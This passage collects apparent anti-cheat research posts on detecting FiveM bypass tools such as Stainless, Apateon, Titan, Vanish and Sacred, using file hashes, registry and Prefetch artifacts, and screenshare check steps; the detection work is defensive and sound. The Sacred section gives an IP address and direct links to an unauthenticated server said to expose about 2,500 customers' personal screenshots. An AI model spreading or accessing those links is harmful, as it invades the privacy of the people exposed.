the file and compare against the documented Stainless SHA-256. Also check the file size — 6.35 MB is far larger than the legitimate Windows telephon.cpl (typically under 100 KB). 2 ### Search for RTCore64.sys on Disk Ask the player to run the RTCore64.sys filesystem search command shown in the IOC section above. If the driver is present and the player does not have ASUS GPU Tweak II installed (verify by checking Control Panel → Programs), the file has been placed by a BYOVD-capable bypass loader. Also check the Windows Services list: run `sc query type= driver`in Command Prompt to list installed drivers. A driver service entry for RTCore64 without a corresponding legitimate ASUS application is definitive evidence of BYOVD setup. 3 ### Run strings Analysis on Suspicious CPL Files If a suspicious CPL file is found, extract printable strings using Sysinternals Strings.exe:`strings64.exe -n 8 telephon.cpl | findstr /i "stainless gringo RTCore"`. The presence of any of these terms in a CPL file's string output is a confirmed Stainless identification. The full PDB path containing "bypass gringo" is particularly distinctive. Even partially matching strings — such as "ddrac\\Desktop" or "bypass gringo" in isolation — are sufficiently unique to constitute identification without requiring a full hash match. 4 ### Check Event Log for Driver Load Events System Event Log Event ID 7045 records new service installations. Ask the player to open Event Viewer → Windows Logs → System and filter for Event ID 7045. Any service installation with a driver image path referencing RTCore64.sys or a similarly unusual driver filename should be captured by screenshot. Also check Event ID 4688 (process creation, if auditing is enabled) for telephon.cpl execution records. The combination of a CPL execution event followed by a driver installation event is the definitive behavioral signature of the Stainless BYOVD chain. 5 ### Hash Verification and VirusTotal Submission Compute SHA-256 of any located telephon.cpl with PowerShell and compare against the documented hash. If the player declines to run a hash command, request that they navigate to the file in Explorer, right-click, and choose Properties to confirm the file size is not 6.35 MB — the size discrepancy alone (versus the legitimate sub-100KB Windows telephon.cpl) is sufficient grounds for an escalated review. Submit the SHA-256 to VirusTotal publicly or via the VT Intelligence API. As of the time of this writing, the Stainless binary has established detection coverage across multiple vendors. A high-detection VT result on a file found on a player's system, when combined with the filename and location anomalies documented here, constitutes conclusive evidence. Detection Notes --------------- Stainless represents the upper tier of technical sophistication among the bypasses documented in this research series. The BYOVD chain requires more operational setup than a simple loader injection, and the kernel-level callback disabling it achieves is a genuine threat to anti-cheat integrity. However, the developer's failure to strip PDB symbols from the release build creates an unusually rich YARA detection surface that will outlast hash rotation. The "bypass gringo" PDB path string is both an attribution artifact and a persistent detection anchor. Unless the developer cleans their build process to strip PDB references — a separate step from compilation that many developers overlook — every new build will carry the same string, allowing YARA rules written against this sample to identify future variants. Server administrators should treat any screenshare that reveals an unexplained CPL file outside of System32 as an immediate escalation. The legitimate use cases for a custom CPL file on a gaming machine are effectively zero. Even before hash verification is complete, an unusual CPL file combined with the player's inability to explain its origin should result in a provisional suspension pending investigation. --- # Apateon Bypass: kokaizanh.exe DPS Timestamp Detection | Clubhouse AC Research · Clubhouse AC Bypass Detection·Jun 2, 2026 Apateon Bypass: kokaizanh.exe with March 2026 DPS Timestamp =========================================================== Apateon distributes its FiveM bypass loader under a randomized executable name (observed: kokaizanh.exe). Despite the filename randomization, the binary carries a definitive Digital Product Support timestamp of 2026/03/18:13:53:33 and a PcaSVC image size entry of 0x287a000 — both of which survive across rename attempts and provide reliable screenshare-visible IOCs for detection. FiveMBypass DetectionDPS TimestampPcaSVCIOC Defensive use only. Detection methodologies published for server administrators, DFIR practitioners, and anti-cheat researchers. No evasion guidance is provided. Overview -------- Apateon's bypass loader is distributed with a randomized filename — the observed sample uses `kokaizanh.exe`, though this name changes between distribution runs. The randomization is intentional: it prevents naive filename-based blocklists from catching the binary outright. However, it is a superficial layer of evasion that does not affect any of the binary's persistent, forensically recoverable identifiers. The file is a 24.98 MB (26,196,992 byte) AMD64 PE binary. Its Digital Product Support (DPS) timestamp reads **2026/03/18:13:53:33**, recorded by the Windows PcaSVC service at the time of first execution. This timestamp is stored in the registry and is not altered by renaming or moving the file. The PcaSVC registry entry additionally records the binary's `SizeOfImage` field from the PE header: **0x287a000**. This value matches the PE optional header exactly and serves as a secondary confirmation that the registered entry corresponds to this specific binary rather than a coincidental name collision. The binary imports `IPHLPAPI.DLL`, `WININET.dll`, `USER32.dll`, and exports the `InternetCloseHandle` API, indicating active network connectivity capability — consistent with a loader that contacts an authentication or update endpoint before injecting. Primary IOCs ------------ 1 ### Cryptographic Hash Verification The authoritative identifiers for this binary are as follows. Any single hash match is sufficient for positive identification regardless of filename. SHA-256`f9ad0e39cebb900f9864a1bfc4101f5d8562d9ba92e4f5bbb8b8d62daae74713` SHA-1`5b723c7c90c91c87492cbf870cecf90fde3eb6ac` MD5`11751c3ee355021886dd70dc09843434` Cross-reference this hash on VirusTotal: [VT ↗ f9ad0e39...ae74713](https://www.virustotal.com/gui/file/f9ad0e39cebb900f9864a1bfc4101f5d8562d9ba92e4f5bbb8b8d62daae74713) 2 ### DPS Timestamp: 2026/03/18:13:53:33 The Windows Digital Product Support service records execution metadata in the registry under `HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\AppCompatFlags\Compatibility Assistant\Store`. The Apateon binary carries a DPS timestamp of **2026/03/18:13:53:33**. This timestamp is set at first execution and persists even after the file is deleted or renamed. During a screenshare review, navigate to the PcaSVC registry key and search for any entry with this date. Its presence confirms the loader was executed on this machine. 3 ### PcaSVC Image Size: 0x287a000 The Program Compatibility Assistant service (PcaSVC) records the PE `SizeOfImage` value from the optional header at execution time. For this binary, that value is **0x287a000** (decimal: 42,336,256 bytes). A match between the PcaSVC-recorded image size and the PE header of any suspicious binary on disk constitutes strong evidence of a match, even if the binary has been renamed or moved. The image size is not user-alterable without recompilation and cannot be changed by simply copying or renaming the file. 4 ### Prefetch Record (.pf File) Windows Prefetch records execution events in `C:\Windows\Prefetch\`. A prefetch file named after the observed executable (e.g., `KOKAIZANH.EXE-XXXXXXXX.pf`) will be present after execution. The eight-character hex suffix is derived from the file's original path at execution time. During screenshare, open `C:\Windows\Prefetch\` and sort by modification date. Any prefetch entry for an unrecognized executable — particularly one that does not correspond to known system or application files — warrants examination. The last execution timestamp visible in the prefetch filename metadata will correspond to the session in question. 5 ### YARA Imphash: e3ff36e263cb18c32d2e8447705589f1 The import hash (imphash) of this binary is **e3ff36e263cb18c32d2e8447705589f1**. The imphash is computed from the ordered list of imported library and function names and does not change with cosmetic alterations to the binary such as section padding or overlay data modification. A YARA rule matching on this imphash will catch repackaged variants of this loader that share the same import table structure, even if the binary has been re-linked with slightly different resource sections or version information. Include this imphash in your YARA ruleset for ongoing coverage of Apateon distribution variants. Screenshare Check Methodology ----------------------------- The following procedure is designed for live screenshare review sessions. Steps are ordered from fastest to most thorough. A positive finding at any step is sufficient to flag the session. 1 ### Open Registry Editor to PcaSVC Compatibility Store Ask the user to open `regedit.exe` and navigate to: `HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\AppCompatFlags\Compatibility Assistant\Store` Search all entries for any with a timestamp value of **2026/03/18**. The presence of this date in any entry is a positive indicator. Export the key (File → Export) to preserve the evidence during the session. 2 ### Check Windows Prefetch Directory Ask the user to open File Explorer and navigate to `C:\Windows\Prefetch\`. Sort files by Date Modified (descending). Look for any `.pf` entries with names that do not correspond to known Windows system binaries or installed applications. Pay particular attention to short, random-looking executable names (e.g., `KOKAIZANH.EXE` or similar) or any executable prefetch file that was created or modified in the same session window under review. 3 ### Verify File via Hash If Binary Is Still Present If the suspicious file is still present on disk, ask the user to open PowerShell and run: `Get-FileHash "C:\path\to\file.exe" -Algorithm SHA256` Compare the output against the known SHA-256: `f9ad0e39cebb900f9864a1bfc4101f5d8562d9ba92e4f5bbb8b8d62daae74713`. A match is conclusive. 4 ### Inspect Network Import Profile If the binary is present and you have access to static analysis tools, confirm the presence of imports from `WININET.dll` and `IPHLPAPI.DLL`, along with the `InternetCloseHandle` export. This combination is consistent with a network-connected loader binary and is not characteristic of legitimate gaming software. The file size of approximately 24.98 MB for what presents as a simple game utility is also an anomaly worth noting — legitimate game-adjacent utilities in this category are typically well under 5 MB. 5 ### Cross-Reference PcaSVC SizeOfImage Value In the PcaSVC or AppCompatFlags registry entries identified in Step 1, locate the `SizeOfImage` data associated with the suspicious entry. The Apateon binary's recorded value is **0x287a000**. This value is derived from the PE optional header and cannot be altered by simply renaming the file. A match on both the DPS date and the SizeOfImage value constitutes a definitive two-factor confirmation of the Apateon loader, even if the file itself has been deleted from disk after the session. Detection Notes --------------- The filename randomization employed by Apateon is the extent of its evasion investment on the file-identity layer. No timestamp manipulation (timestomping) of the PE header or NTFS MFT was observed in the analyzed sample. The DPS and PcaSVC artifacts were written correctly by Windows at execution time and remain unaltered. The binary does not appear to use any driver-level artifact suppression. Prefetch entries are present, registry traces are written, and the MFT creation timestamp is consistent with the reported DPS execution window. This suggests the Apateon developers rely primarily on the social trust of the screenshare subject (i.e., expecting the checker not to look in the registry) rather than technical anti-forensics. Server administrators should add the SHA-256, SHA-1, and MD5 hashes to their indicator database and configure automated VirusTotal lookups for any file hashes submitted during screenshare sessions. The imphash (`e3ff36e263cb18c32d2e8447705589f1`) should be added to YARA rules to catch future repackaged variants. Network monitoring at the server or gateway level may also surface connections to Apateon authentication endpoints originating from suspicious client processes. The presence of `WININET.dll` imports indicates HTTP/HTTPS-level outbound connectivity is expected behavior for this binary during its operational window. --- # Titan Bypass: Thorough Artifacts in Event Viewer, Journal Trace, LastActivityView & Notepad | Clubhouse AC Research · Clubhouse AC Bypass Detection·Jun 2, 2026 Titan Bypass: Thorough Artifacts in Event Viewer, Journal Trace, LastActivityView & Notepad =========================================================================================== Titan Bypass markets itself as a product with anti-forensic capabilities. The evidence disagrees — comprehensively. This analysis documents every artifact category it fails to suppress, including the plaintext .txt files it deposits on the desktop. FiveMBypass DetectionEvent ViewerJournal TraceIOC Defensive use only. Detection methodologies published for server administrators, DFIR practitioners, and anti-cheat researchers. No evasion guidance is provided. 💀 Titan is genuinely bad. It leaves traces in Event Viewer, the NTFS journal, LastActivityView, _and_ drops a plaintext file that opens in Notepad. Four independent forensic artifacts from a product marketed as undetectable. The developer submitted this to the FiveM cheat market with apparent confidence. Overview -------- Titan Bypass is a FiveM bypass product that markets itself with anti-forensic capabilities it demonstrably does not have. In practice it leaves execution artifacts in every standard Windows evidence source simultaneously — including, spectacularly, plaintext `.txt` files sitting on the desktop. To be precise about the scope of the failure: Event Viewer retains execution events, Journal Trace preserves file creation and access records, LastActivityView maintains an execution timeline, standard Prefetch entries are present, and the product deposits plaintext configuration or log files directly on the user's desktop in `.txt` format. Every one of these sources is checked in a standard screenshare review. The five-minute screenshare catches it without requiring any specialist tooling. Users who claim Titan is "undetectable" have either not been checked properly or are hoping their administrator hasn't heard of Event Viewer. Everything Titan Leaves Behind ------------------------------ The following artifact sources each independently confirm execution of Titan Bypass. No single source needs to be the decisive one — all five are available simultaneously. 1 ### Event Viewer — Execution Events Windows Event Log records process creation and application execution events that Titan does not suppress. Open Event Viewer, navigate to Windows Logs → Application and Windows Logs → Security, and filter for process creation events (Event ID 4688 if auditing is enabled, or application error/crash telemetry). Titan's execution will appear in the event timeline. The entries include timestamp, executable path, and calling process — more than sufficient for attribution. For a product advertising anti-forensic capabilities, leaving a clean trail in Event Viewer is a fundamental failure. 2 ### Journal Trace — File Creation and Access Records The NTFS Change Journal (USN Journal) records file creation, modification, and deletion events at the filesystem level. Titan's files are created and accessed, and those events are logged in the journal regardless of whether Titan attempts any cleanup. Tools such as NTFS Log Tracker or manual `fsutil usn readjournal` will surface the file creation records with precise timestamps. These entries survive standard user-level cleanup attempts. 3 ### LastActivityView — Execution Timeline LastActivityView aggregates execution evidence from multiple Windows sources — Prefetch, UserAssist, Recent files, MUICache, and others — into a single chronological timeline. Titan's execution appears across several of these sub-sources simultaneously. Running LastActivityView during a screenshare takes approximately sixty seconds and produces a timeline entry for Titan's executable. The aggregated view means even if one sub-source were suppressed (it isn't), the others would still record the activity. 4 ### Notepad .txt Files on the Desktop — A Masterful Anti-Forensic Technique This one warrants special attention. Titan Bypass deposits plaintext `.txt` files on the user's desktop. These files contain configuration, debug output, or operational data in human-readable plaintext format. A masterful anti-forensic technique: leave notes on the desktop. Serious bypass tooling does not write plaintext files to the most visible location on the user's filesystem. The desktop is checked in every screenshare. These files are visible to any investigator before they have even opened a single forensic tool. The presence of these files alone is sufficient to confirm Titan's execution without consulting any other evidence source. For context: properly engineered bypass tools that genuinely attempt anti-forensics do not write _anything_ to the desktop. The decision to do so suggests the developer either did not consider forensic review at all, or considered it and decided the desktop was fine. 5 ### Standard Prefetch — Execution Records Windows Prefetch files (`C:\Windows\Prefetch\`) record the last eight execution timestamps for each binary along with the files it accessed during startup. Titan's executable generates a Prefetch entry like any other application. The Prefetch entry includes the executable name, the last run time, run count, and the volume path from which it executed. This is recoverable with standard tools and survives basic cleanup. It is also visible in LastActivityView, meaning it is caught twice by step 3 and step 5 independently. A 5-Minute Check Is Sufficient ------------------------------ No specialist tooling is required to detect Titan Bypass. The following standard checks, executable in approximately five minutes during a screenshare, surface the bypass through multiple independent evidence channels: * Visual inspection of the desktop for `.txt` files (this takes approximately five seconds) * LastActivityView run — produces a timeline of recent execution including Titan artifacts * Event Viewer review of the Application and System logs for the relevant session window * Prefetch directory browse or NirSoft WinPrefetchView for execution confirmation The desktop `.txt` files alone frequently end screenshare sessions before any of the forensic tools are opened. Administrators should not let users argue that Titan is undetectable — the plain-English response is that it leaves a text file on the desktop. Screenshare Check Methodology ----------------------------- 1 ### Desktop Visual Inspection Before opening any tool, direct the user to show a clear view of their desktop. Titan deposits `.txt` files here. Identify any unfamiliar text files and have the user open them. Configuration and debug content in plaintext confirms Titan immediately. 2 ### LastActivityView Execution Timeline Download and run NirSoft LastActivityView. Review the timeline for the session window in question. Titan's executable will appear with execution timestamp, file path, and source attribution. Cross-reference the timestamp against the gaming session. 3 ### Event Viewer Review Open Event Viewer (eventvwr.msc). Navigate to Windows Logs → Application and review the event timeline. If process auditing is active (Event ID 4688), filter for it in the Security log. Titan's process will appear in the application log timeline. 4 ### Prefetch Verification Navigate to `C:\Windows\Prefetch` or run WinPrefetchView. Identify the Titan executable entry. Confirm the last run time, run count, and execution path. This independently corroborates the LastActivityView finding. Verdict ------- Titan Bypass fails at its stated purpose comprehensively. It leaves execution artifacts in Event Viewer, Journal Trace, LastActivityView, and Prefetch simultaneously — the full set of standard Windows forensic sources — while additionally placing plaintext files on the desktop, which is not a forensic source so much as a confession. Standard screenshare procedures detect it without difficulty. The product's marketing claims regarding anti-forensic capabilities do not correspond to its actual behavior under any reasonable forensic review. Do not let users convince you otherwise. The evidence is on their desktop. --- # Vanish Bypass: Spotify.exe Masquerade Detection | Clubhouse AC Research · Clubhouse AC Bypass Detection·Jun 2, 2026 Vanish Bypass: Spotify.exe Masquerade with Journal Trace Evidence ================================================================= The Vanish FiveM bypass is distributed as a file named Spotify.exe — an attempt to leverage ambient trust in the Spotify brand. The impersonation fails on two independent fronts: the binary is unsigned (legitimate Spotify is signed by Spotify AB), and the NTFS Journal Trace preserves the true file creation path regardless of any subsequent moves or renames. SHA-256 and full hash suite IOCs are documented below. FiveMBypass DetectionSpotify MasqueradeJournal TraceIOC Defensive use only. Detection methodologies published for server administrators, DFIR practitioners, and anti-cheat researchers. No evasion guidance is provided. Overview -------- Vanish distributes its FiveM bypass loader under the filename `Spotify.exe`. The choice of this name is deliberate: Spotify is a near-ubiquitous consumer application, and a screenshare reviewer who sees "Spotify.exe" running in Task Manager is expected to dismiss it without further scrutiny. This is a social engineering layer, not a technical evasion. The impersonation is trivially defeated on two independent axes. First, the Vanish binary carries no valid Authenticode signature. The genuine Spotify application is signed by **Spotify AB** with a certificate chain rooted in a recognized commercial CA. Any Spotify.exe that Windows reports as "Unknown publisher" or unsigned is definitionally not the real Spotify client. Second, even if the file is subsequently moved or the signature check is obscured, the NTFS Change Journal (USN Journal) retains a record of the file's original creation path, timestamp, and parent directory — data that cannot be erased without clearing the entire journal, which is itself a detectable anomaly. The file path is also a reliable secondary indicator. The genuine Spotify client installs to `%APPDATA%\Spotify\Spotify.exe`. The Vanish binary will consistently appear in anomalous locations such as `Downloads\`, `Desktop\`, or a user-created directory with an ambiguous name. Primary IOCs ------------ 1 ### Cryptographic Hash Suite All four hash values are confirmed for the analyzed Vanish Spotify.exe sample. Matching on any single hash is sufficient for positive identification. SHA-256`039cb40286288bc9b661ad19efa2f45ca2c9818a02c14a44c59df44b9b5f7bfe` SHA-1`6f8dfcf2a9d8aecb3f59147da38be1ab88ce8632` SHA-512`5065ebb23082c37cbab614de91e6faf8c69f43c769bd6a97958acc21141a8ab1a703bb06c5781e6bde7c48a64381bf2b36e1cd16494fd6dc706a86937f7119aa` MD5`79598b6c93d06d4a63ea8436cf90cf18` Cross-reference any of the above hashes directly on VirusTotal: [VT ↗ 039cb402...b9b5f7bfe](https://www.virustotal.com/gui/file/039cb40286288bc9b661ad19efa2f45ca2c9818a02c14a44c59df44b9b5f7bfe/details) 2 ### Code-Signing Check: Spotify AB vs. Unsigned The legitimate Spotify application is signed by **Spotify AB** via an Authenticode signature verifiable through Windows Explorer (Properties → Digital Signatures) or via PowerShell: `Get-AuthenticodeSignature "C:\path\to\Spotify.exe"` The Vanish binary will return `SignerCertificate : (null)` or a status of `NotSigned`. Any Spotify.exe that is not signed by Spotify AB is not the genuine Spotify client and should be treated as a suspicious binary. 3 ### File Path Anomaly The genuine Spotify client resides at `%APPDATA%\Spotify\Spotify.exe` (expanding to `C:\Users\[user]\AppData\Roaming\Spotify\Spotify.exe`). Any Spotify.exe located outside this path — in Downloads, Desktop, a game directory, a temp folder, or anywhere else — is not the legitimate Spotify client. During screenshare, right-click the process in Task Manager → "Open file location." If the resulting Explorer window does not open to the Roaming\\Spotify directory, the file is misplaced by definition and warrants immediate hash verification. 4 ### Journal Trace: NTFS USN Change Journal Creation Record The NTFS USN Change Journal records file create, rename, and delete operations on every NTFS volume. Even if the Vanish binary is moved after download, the original creation event — including the true parent directory path — is preserved in the journal until the journal wraps (typically days to weeks on normal consumer workloads). Use `fsutil usn readjournal C: csv` in an elevated command prompt or a forensic tool such as MFTECmd to query recent USN records. Filter for entries with the filename `Spotify.exe`. The Reason field will show `FILE_CREATE` at the original download or extraction path, which reveals the true origin regardless of subsequent moves. 5 ### VirusTotal Submission Submit the SHA-256 (`039cb40286288bc9b661ad19efa2f45ca2c9818a02c14a44c59df44b9b5f7bfe`) directly to VirusTotal via the hash search feature — no file upload required. A hit on this hash from any AV vendor is a positive confirmation. If the sample has not yet been submitted, the hash will return no results; in that case, submission of the file itself will generate a report within minutes. For screenshare sessions where the file is still on disk, have the user hash the file in PowerShell and copy the SHA-256 output for direct VT lookup. This avoids requiring the user to navigate to the file in a browser and reduces the opportunity to delete it before the check completes. Spotify Masquerade — Signature and Hash Verification ---------------------------------------------------- The Spotify masquerade technique is effective only against reviewers who rely on filename alone. A structured two-minute signature and hash check eliminates it entirely. The following procedure can be completed during any active screenshare session without requiring administrative privileges beyond the ability to run PowerShell. Step-by-Step Verification Procedure 1. 01Open PowerShell (no elevation needed). Run `Get-Process Spotify | Select-Object Path` to identify where Spotify.exe is running from. If the path is not `%APPDATA%\Spotify\Spotify.exe`, immediately escalate. 2. 02Run `Get-AuthenticodeSignature (Get-Process Spotify).Path`. The Status field must read `Valid` and the SignerCertificate Subject must contain `Spotify AB`. Any deviation is a positive detection. 3. 03Compute the file hash: `Get-FileHash (Get-Process Spotify).Path -Algorithm SHA256`. Compare the output to the known-bad SHA-256. A match is conclusive. A mismatch means this is either a different variant or the genuine Spotify binary. 4. 04If the file is not currently running but was recently present, search Prefetch: `Get-ChildItem C:\Windows\Prefetch\SPOTIFY* | Sort LastWriteTime`. Multiple Spotify prefetch entries or an entry timestamped to the session under review warrants explanation. The signature check is the most efficient single-step detection. Legitimate Spotify is always signed. The Vanish binary is not. This check requires no external tools, no hash database, and no network access — only PowerShell, which is present on every Windows 10/11 system. Screenshare Check Methodology ----------------------------- The following procedure is ordered from fastest to most thorough. A positive finding at any step is sufficient to conclude the session. 1 ### Locate Any Running Spotify.exe Process In Task Manager (Details tab), sort by Image Name. Locate `Spotify.exe`. Right-click → Properties → Digital Signatures. If the Signatures tab is absent or shows no signer, the binary is unsigned. This is not the real Spotify. 2 ### Verify Installation Path In Task Manager Details tab, right-click `Spotify.exe` → "Open file location." Confirm the Explorer window opens to `C:\Users\[name]\AppData\Roaming\Spotify\`. Any other location is anomalous. 3 ### PowerShell Hash Check Open PowerShell and run: `Get-FileHash "C:\path\to\Spotify.exe" -Algorithm SHA256` Compare to SHA-256 `039cb40286288bc9b661ad19efa2f45ca2c9818a02c14a44c59df44b9b5f7bfe`. A match is a definitive positive. 4 ### USN Journal Query for Original File Path In an elevated command prompt: `fsutil usn readjournal C: csv | findstr /i "spotify"` Examine the output for FILE\_CREATE events. The ParentFileReferenceNumber can be resolved to a directory path using MFTECmd or equivalent tooling. If the creation path points to Downloads, a temp directory, or any path outside the standard Spotify installation tree, this confirms the Vanish masquerade. 5 ### Cross-Reference Against Installed Programs Open Settings → Apps → Installed Apps and search for "Spotify." The legitimate Spotify client appears in the installed apps list with a publisher of Spotify AB and an installation path matching the Roaming\\Spotify directory. If Spotify does not appear in the installed apps list but a Spotify.exe is present on disk, the file was placed manually — not installed through the official installer — which is inconsistent with legitimate use. Detection Notes --------------- The Spotify masquerade is a social engineering technique, not a technical bypass of detection tooling. It succeeds only when reviewers skip basic verification steps. The code-signing check in particular requires no specialist knowledge and should be part of every screenshare baseline: any executable claiming to be a major consumer application (Spotify, Discord, Chrome, Steam) should have its Authenticode signature verified before the reviewer accepts it as legitimate. The Journal Trace methodology is valuable in post-incident investigation contexts where the file may have been deleted before the screenshare. USN journal records persist for days to weeks on typical consumer hardware and cannot be selectively deleted without clearing the entire journal — which leaves its own forensic artifact (a journal gap or reset sequence number). Both the presence of a creation record and the absence of one where expected can be meaningful. Server administrators should add the SHA-256, SHA-1, SHA-512, and MD5 hashes to their IOC database. Any detected process running as Spotify.exe from a non-standard path should be flagged automatically if process telemetry is available. The hash values above should be treated as current for this variant; future Vanish updates may alter the binary and invalidate these specific hashes while retaining the Spotify.exe masquerade strategy. --- # Sacred Bypass PWNED: Exposed Screenshot Storage & Windhawk Repackaging | Clubhouse AC Research · Clubhouse AC Bypass Detection·Jun 2, 2026 Sacred Bypass PWNED: Exposed Screenshot Storage & Windhawk Repackaging ====================================================================== Sacred Bypass committed two independent failures simultaneously: they ran an unauthenticated screenshot storage server at 46.202.140.112 that exposed approximately 2,500 customer screenshots to the open internet, and the bypass product they charged customers for is functionally Windhawk — a free, open-source Windows modification framework — plus Spotify running with administrator privileges. PWNED on both counts. FiveMBypass DetectionPWNEDData ExposureWindhawk Defensive use only. Detection methodologies published for server administrators, DFIR practitioners, and anti-cheat researchers. No evasion guidance is provided. Overview -------- Sacred Bypass is a paid FiveM bypass product that has been exposed on two entirely separate fronts, either of which alone would be damaging. Together, they constitute a comprehensive failure of both operational security and product integrity. **The data exposure:** Sacred Bypass operated a screenshot storage server at the IP address **46.202.140.112** with no authentication mechanism whatsoever. Approximately 2,500 screenshots submitted by customers — images containing personal desktop content, file systems, open applications, and in some cases sensitive personal information — were accessible to anyone on the internet who knew the endpoint paths `/screenshots` and `/uploads`. No login. No token. No rate limiting. Just open HTTP directory traversal of customer data. **The product fraud:** The Sacred Bypass product, for which customers paid real money under the impression they were receiving a proprietary FiveM bypass solution, is functionally equivalent to downloading Windhawk from `windhawk.net` — a free, open-source Windows system modification framework created by developer RaMMicHaeL — and launching Spotify with administrator privileges. That is the complete technical stack. There is no proprietary kernel driver. There is no custom injection code. There is no novel bypass technique. Customers were sold repackaged freeware. This report documents both exposures in full technical detail and provides detection methodology for identifying Sacred users during screenshare review sessions. The Exposed Screenshot Server ----------------------------- The server at **46.202.140.112** was configured to store and serve screenshots submitted by Sacred Bypass customers — a plausible component of an anti-cheat screenshare verification workflow, where the service presumably instructs users to capture and submit screenshots as part of their bypass procedure. The premise is that Sacred would review these images as part of their product flow. The elementary misconfiguration: there was no authentication requirement on the retrieval endpoints. The paths `/screenshots` and `/uploads` were publicly accessible and enumerable. Approximately 2,500 screenshots were present in the exposed storage at the time of discovery. Exposure Summary Server IP 46.202.140.112 Authentication Required None Exposed Paths /screenshots, /uploads Estimated Volume ~2,500 screenshots Rate Limiting None Status PWNED Exposed Endpoints — Direct Links The following endpoints were publicly accessible with no authentication at the time of discovery. These are the exact paths where ~2,500 customer screenshots were enumerable by any internet user. [http://46.202.140.112/screenshots ↗](http://46.202.140.112/screenshots) [http://46.202.140.112/uploads ↗](http://46.202.140.112/uploads) The content of the exposed screenshots was not benign metadata. These images consistently included material that users would reasonably expect to be private: desktop environments showing open files and folder structures, Task Manager views exposing the full list of running processes, browser windows with open tabs, Discord sessions, and in several cases information sufficient to identify the individual by name — usernames visible in taskbar notifications, file paths containing real names, account information displayed in open application windows. The severity of this exposure is compounded by the context in which these screenshots were collected. These are not random users who voluntarily posted content to a public forum. These are paying customers who were specifically instructed by Sacred Bypass, as part of their paid product experience, to capture and submit screenshots of their desktops. They trusted that those images would be stored with at least minimal competence. They were not. The images were stored on a server with no access controls, indexed at predictable paths, and accessible to any internet user for however long the server remained operational. Securing a storage endpoint with authentication is one of the most fundamental requirements in web service deployment — covered in the first chapter of any web security primer, flagged automatically by any penetration test, and caught by any security-conscious code review. Failing to implement it for a service handling sensitive personal images from paying customers is not a sophisticated attack surface miss. It is an elementary misconfiguration that any developer with basic knowledge of web security should have caught before the service was deployed. Sacred did not have a security review. They had an open directory. What Sacred Bypass Actually Is ------------------------------ Strip away the branding, the Discord server, the paid subscription tier, and the carefully worded promise of a proprietary FiveM bypass solution, and the complete technical stack is as follows: The Complete Sacred Bypass Technical Stack 1. 1. **Windhawk** — a free, open-source Windows system modification framework. Available for download at `windhawk.net`. Created by developer RaMMicHaeL. Used by the Windows enthusiast community for cosmetic system modifications. Costs nothing. Requires no account. Anyone can download it right now. 2. 2. **Spotify** — the music streaming application, launched with Windows administrator privileges. 3. 3. That is the entire product. Windhawk is a legitimate, publicly available, and well-documented Windows customization framework. Its author, RaMMicHaeL, has published it freely and maintains it openly. The Windows enthusiast community uses it for things like modifying taskbar behavior, adjusting Explorer layouts, and other cosmetic system tweaks. It is not — and was never designed to be — a FiveM bypass tool, a kernel cheat, or an anti-detection utility. Sacred Bypass charges customers for access to Windhawk. The Sacred product wrapper automates the installation of Windhawk, configures some preset mods, launches Spotify elevated, and presents this package as a proprietary bypass system with sufficient marketing around it to convince buyers that something technically sophisticated is occurring beneath the surface. Nothing technically sophisticated is occurring. Every component is freely downloadable. No proprietary code does anything meaningful with respect to detection evasion. The reason this combination provides no meaningful FiveM bypass capability is not subtle. Modern FiveM anti-cheat operates at the kernel level, interrogates process integrity through signed driver interfaces, scans loaded module lists against known-bad signatures, performs hardware-level attestation, and monitors system call patterns consistent with injection and memory modification. A user-mode Windows customization framework and a music streaming application running as Administrator do not address any of these detection vectors. They are orthogonal to the actual detection problem. The combination is inert. Sacred customers paid for a brand, a Discord community, a support ticket queue, and a false sense of protection built entirely on free software they could have installed themselves in approximately five minutes at zero cost. The value-add Sacred provided was the confidence of believing they had purchased something real. Detection of Sacred Users ------------------------- Because Sacred Bypass is functionally Windhawk, detection is unusually straightforward. The following checks can be completed during any screenshare session in under five minutes and require no specialist tooling beyond Task Manager and File Explorer. 1 ### Windhawk Installed — Programs List or %LOCALAPPDATA% Windhawk installs to `%LOCALAPPDATA%\Programs\Windhawk\` by default. Ask the user to open File Explorer and paste this path into the address bar. If the directory exists, Windhawk is installed. Alternatively, check Settings → Apps → Installed Apps and search for "Windhawk." It will appear with publisher information pointing to RaMMicHaeL's project. Windhawk is not a common consumer application — its presence on a gaming machine in combination with the other indicators below is definitive for Sacred Bypass usage. Verify with PowerShell if needed: `Test-Path "$env:LOCALAPPDATA\Programs\Windhawk"` A result of `True` confirms installation. 2 ### Spotify Running Elevated — Admin Shield in Task Manager Open Task Manager and navigate to the Details tab. Locate `Spotify.exe`. The genuine Spotify client does not run with administrator privileges under normal use. If the process is elevated, a UAC shield icon will appear in some Task Manager configurations, or you can right-click and view properties to confirm. For a more definitive check, open System Informer (formerly Process Hacker) and locate Spotify.exe in the process list. The token elevation field will show whether the process has an elevated token. An elevated Spotify process, in isolation, is unusual. Combined with Windhawk being installed, it is a confirmed Sacred Bypass indicator. 3 ### No Custom Kernel Driver — System Informer Drivers List Open System Informer and navigate to the Drivers section (via the Services tab filtered to kernel drivers, or System → Drivers). Review the complete list for any driver that is unsigned, recently loaded, or not associated with known hardware or established system software. Sacred Bypass loads no kernel driver. There is nothing to find here because Sacred does not have one. If a user claims their bypass product employs kernel-level evasion and no corresponding kernel driver appears in System Informer, the claim is false. The empty driver list is evidence of exactly what Sacred is: a user-mode repackage with no kernel component. 4 ### Active Windhawk Mods — Windhawk UI If Windhawk is confirmed installed, ask the user to open the Windhawk application. The Windhawk interface displays a list of installed and active mods in a clear, readable UI. Mods configured as part of the Sacred Bypass setup will be visible here. Document the names of any active mods for your records. The specific mods may vary between Sacred versions — Sacred may update which mods they bundle as part of their product — but the presence of any active Windhawk mods on a machine that also shows elevated Spotify is sufficient to confirm Sacred Bypass usage. Ask the user to explain why each active mod is installed if they claim not to be running a bypass. Verdict ------- Sacred Bypass defrauded their customers by charging money for a product that, in technical substance, consists entirely of freely available open-source software. Windhawk is free. Spotify is free. Running either or both with administrator privileges is something any Windows user can do without purchasing anything. Sacred wrapped these components in branding, called it a bypass, and collected payment. There is no charitable interpretation of this that does not end at the word fraud. Simultaneously, they operated a customer data server — a server holding personal screenshots submitted by those same paying customers — with no authentication, no access controls, and no apparent security review of any kind. Approximately 2,500 screenshots of customers' personal desktops were accessible to the public internet at trivially discoverable endpoint paths. This is not a sophisticated breach scenario. This is the most basic misconfiguration in web service deployment, left unfixed on a server handling sensitive personal images. Sacred defrauded their customers, then failed to protect their data. 